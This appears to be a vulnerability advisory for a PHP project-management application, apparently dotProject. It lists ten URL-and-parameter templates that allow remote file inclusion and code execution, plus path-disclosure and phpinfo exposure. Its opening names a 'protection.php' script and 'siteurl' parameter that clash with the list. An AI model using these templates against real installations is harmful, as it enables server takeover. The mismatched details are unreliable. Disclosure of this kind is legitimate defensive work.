Details:
The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
Some user-supplied input is not checked correctly so an attacker can include a remote php file and
execute arbitrary phpcode or arbitrary system command via eval().

Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
To exploit these vulnerables register_globals have to be set ON (default).

1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]

3) /includes/session.php?baseDir=[REMOTE INCLUDE]

4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

There are also some path discolsure bugs:

Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
baseDir=foobar.

Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
disclose you some system informations:

1) /docs/phpinfo.php - A phpinfo() file.

2) /docs/check.php - Some more informations about the installed dotProject.